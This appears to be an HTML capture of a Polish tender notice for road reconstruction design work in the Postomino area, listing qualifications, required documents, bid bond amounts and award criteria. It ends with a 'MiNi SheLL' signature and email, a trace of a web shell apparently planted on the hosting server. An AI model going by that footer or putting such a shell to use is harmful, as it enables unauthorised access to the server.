6.3.2. Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca zapewni przy realizacji zamówienia udział osoby/osób posiadających następujące uprawnienia: 

6.3.2.1. CZĘŚĆ I: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia  drogowego do wielorodzinnego budynku mieszkalnego (etap I) i do fermy drobiu (etap II) na dz. nr 123 i 192 obręb Staniewice 
1)	uprawnienia do celów projektowych w branży drogowej,
2)	uprawnienia do celów projektowych w branży elektrycznej. 


6.3.1.2. CZĘŚĆ II: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego i ciągu pieszego w m. Pałowo realizowaną w II etapach na dz. nr 93 i 118 obręb Pałowo 
1)	uprawnienia do celów projektowych w branży drogowej,
2)	uprawnienia do celów projektowych w branży elektrycznej. 


6.3.1.3. CZĘŚĆ III: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego realizowanego w III etapach na dz. nr 237, 222, 214, 210/21 obręb Pieszcz 
1)	uprawnienia do celów projektowych w branży drogowej,
2)	uprawnienia do celów projektowych w branży elektrycznej. 

6.3.1.4.  CZĘŚĆ IV: Przebudowa drogi gminnej wraz ze zjazdami na dz. nr 366/34 obręb Postomino 
1)	uprawnienia do celów projektowych w branży drogowej.

6.3.1.5.  CZĘŚĆ V: Przebudowa drogi gminnej  ul. Korsarzy i odcinka ul. Żeglarzy wraz ze zjazdami i oświetleniem drogowym oraz odwodnieniem na dz. nr 69/154 69/127 obręb Rusinowo 
1)	uprawnienia do celów projektowych w branży drogowej,
2)	uprawnienia do celów projektowych w branży elektrycznej,
3)	uprawnienia do celów projektowych w branży sanitarnej.

6.3.1.6.   CZĘŚĆ VI: Przebudowa odcinka drogi powiatowej wraz z budową chodnika, zejść na plażę i oświetlenia na odcinku od skrzyżowania ul. Bałtyckiej z ulicą Leśną w obrębie Jarosławiec do skrzyżowania z ul. Letniskową obręb Rusinowo 
1)	uprawnienia do celów projektowych w branży drogowej,
2)	uprawnienia do celów projektowych w branży elektrycznej.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  nie
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">11.7.	Wykonawca, którego oferta została najwyżej oceniona, na wezwanie Zamawiającego w wyznaczonym, nie krótszym niż 5 dni, terminie składa aktualne na dzień złożenia oświadczenia lub dokumenty potwierdzające okoliczności, o których mowa w art. 25 ust. 1 w zakresie potwierdzenia braku podstaw wykluczenia:
11.7.1.	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
11.7.2.	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo inny dokument potwierdzający, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub inny dokument potwierdzający, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
11.7.3.	odpis z właściwego rejestru lub z centralnej ewidencji i informacji 
o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />11.5.	Wykonawca, którego oferta została najwyżej oceniona, na wezwanie Zamawiającego 
w wyznaczonym, nie krótszym niż 5 dni, terminie składa aktualne na dzień złożenia oświadczenia lub dokumenty potwierdzające okoliczności, o których mowa w art. 25 ust. 1 w zakresie potwierdzenia spełniania warunków udziału w postępowaniu:
11.5.1.	Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz  załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a  jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - zgodnie z załącznikiem nr 5 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Formularz oferty  załącznik nr 1 do SIWZ,Pełnomocnictwo  - jeżeli dotyczy, Dokument potwierdzający wniesienie wadium, Oryginał zobowiązania, o którym mowa w pkt 8.2.  jeżeli dotyczy. Wykonawca, w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, ze powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Propozycję treści oświadczenia stanowi załącznik nr 4 do SIWZ. 8.2.Na podstawie art. 22a ust. 2 ustawy Pzp Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania  mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia. Przez pisemne zobowiązanie należy rozumieć zobowiązanie złożone w formie oryginału. Wykonawca składa zobowiązanie wraz z formularzem oferty.8.8.	W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami  
w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający żąda dokumentów, które określają w szczególności:
8.8.1.	zakres dostępnych wykonawcy zasobów innego podmiotów,
8.8.2.	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego,
8.8.3.	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
8.8.4.	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. 8.9.Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, przedstawienia w odniesieniu do tych podmiotów dokumentów w zakresie potwierdzenia braku podstaw wykluczenia.



</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />14.1.Zamawiający żąda wniesienia wadium w wysokości:
14.1.1.	CZĘŚĆ I: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego do wielorodzinnego budynku mieszkalnego (etap I) i do fermy drobiu (etap II) na dz. nr 123 i 192 obręb Staniewice 
400,00 zł, słownie: czterysta złotych,
14.1.2.	CZĘŚĆ II: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego i ciągu pieszego w m. Pałowo realizowaną w II etapach na dz. nr 93 i 118 obręb Pałowo 450,00 zł, słownie: czterysta pięćdziesiąt złotych,
14.1.3.	CZĘŚĆ III: Przebudowa drogi gminnej wraz ze zjazdami oraz budową oświetlenia drogowego realizowanego w III etapach na dz. nr 237, 222, 214, 210/21 obręb Pieszcz 
450,00 zł, czterysta pięćdziesiąt złotych,
14.1.4.	CZĘŚĆ IV: Przebudowa drogi gminnej wraz ze zjazdami na dz. nr 366/34 obręb Postomino 200,00 zł, słownie: dwieście złotych, 	
14.1.5.	CZĘŚĆ V: Przebudowa drogi gminnej  ul. Korsarzy i odcinka ul. Żeglarzy wraz ze zjazdami i oświetleniem drogowym oraz odwodnieniem na dz. nr 69/154 69/127 obręb Rusinowo 
600,00 zł, słownie: sześćset złotych
14.1.6.	CZĘŚĆ VI: Przebudowa odcinka drogi powiatowej wraz z budową chodnika, zejść na plażę i oświetlenia na odcinku od skrzyżowania ul. Bałtyckiej z ulicą Leśną w obrębie Jarosławiec do skrzyżowania z ul. Letniskową obręb Rusinowo 900,00 zł, słownie: dziewięćset złotych 
14.2.	Wadium wnosi się przed upływem terminu składania ofert.
14.3.	Wadium może być wniesione w jednej lub kilku następujących formach:
14.3.1.	pieniądzu,
14.3.2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
14.3.3.	gwarancjach bankowych,
14.3.4.	gwarancjach ubezpieczeniowych,
14.3.5.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
14.4.	Wadium wnoszone formie pieniężnej należy wnieść przelewem na rachunek bankowy zamawiającego nr 97 9315 0004 0021 2012 2000 0040. Zaleca się dołączyć do oferty dokument potwierdzający dokonanie przelewu.
14.5.	Za termin wniesienia wadium przyjmuje się datę i godzinę uznania rachunku zamawiającego.
14.6.	W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu  
należy wnieść wraz z ofertą (nie łączyć go trwale z ofertą). 
14.7.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
14.8.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano. 
14.9.	Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
14.10.	Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp,  jeżeli w wyniku rozstrzygnięcia  odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
14.11.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczenia, o którym mowa w art. 25a ust.1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. 
14.12.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
14.12.1.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
14.12.2.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
14.12.3.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
z przyczyn leżących po stronie Wykonawcy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>30</td></tr><tr><td>kara umowna</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionej poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia: 
1)W zakresie zmiany terminu wykonania przedmiotu umowy w przypadku:
a)opóźnienia w przekazaniu materiałów przez Zamawiającego,
b)wad i braków w materiałach przekazanych przez Zamawiającego,
c)w przypadku przedłużających się procedur, niezależnych od Wykonawcy, w zakresie uzyskania niezbędnych decyzji i uzgodnień.
2)W zakresie wynagrodzenia Wykonawcy, na skutek zmiany przepisów prawnych, w tym zmiany stawki od podatku od towarów i usług mającej zastosowanie do przedmiotu umowy,
3)Zmiany osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, przy czym nowo wskazane osoby mają spełniać wymagania określone w SIWZ. 
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com